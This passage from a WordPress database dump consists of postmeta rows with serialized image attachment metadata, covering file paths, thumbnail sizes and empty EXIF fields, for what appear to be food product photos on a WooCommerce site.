:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"green_beans_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"green_beans_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12259,4984,'_wp_attached_file','2020/04/KCL_logo_880x.jpg'),(12260,4984,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:25:\"2020/04/KCL_logo_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"KCL_logo_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"KCL_logo_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"KCL_logo_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12261,4985,'_wp_attached_file','2020/04/MG_6899-2_880x.jpg'),(12262,4985,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:26:\"2020/04/MG_6899-2_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"MG_6899-2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"MG_6899-2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"MG_6899-2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1460884067\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12263,4986,'_wp_attached_file','2020/04/MG_7208_880x.jpg'),(12264,4986,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:24:\"2020/04/MG_7208_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"MG_7208_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"MG_7208_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"MG_7208_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12265,4987,'_wp_attached_file','2020/04/roll_sfw1_880x.jpg'),(12266,4987,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:26:\"2020/04/roll_sfw1_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"roll_sfw1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"roll_sfw1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"roll_sfw1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1404312571\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12269,4776,'_thumbnail_id','4981'),(12274,4772,'_thumbnail_id','4986'),(12279,4771,'_thumbnail_id','4985'),(12284,4768,'_thumbnail_id','4987'),(12289,4765,'_thumbnail_id','4984'),(12293,4763,'_thumbnail_id','4983'),(12298,4760,'_thumbnail_id','4982'),(12303,4753,'_thumbnail_id','4980'),(12306,4988,'_wp_attached_file','2020/04/1_880x.jpg'),(12307,4988,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:18:\"2020/04/1_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"1_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"1_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"1_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"1_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"1_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"1_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"1_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"1_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12308,4989,'_wp_attached_file','2020/04/123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x.jpg'),(12309,4989,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:401;s:4:\"file\";s:57:\"2020/04/123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-550x401.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:57:\"123_ebd4c954-f714-4c67-89ff-f29c97bbed02_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1406490339\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12310,4990,'_wp_attached_file','2020/04/Bread_880x.jpg'),(12311,4990,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2020/04/Bread_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"Bread_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"Bread_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Bread_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Bread_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"Bread_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"Bread_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"Bread_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"Bread_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"Bread_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Bread_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12312,4991,'_wp_attached_file','2020/04/Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x.jpg'),(12313,4991,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:69:\"2020/04/Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:69:\"Courgette_Slice_5569c287-f2ec-407b-8de4-fb20e6f4d3eb_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12314,4992,'_wp_attached_file','2020/04/IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x.jpg'),(12315,4992,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:72:\"2020/04/IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4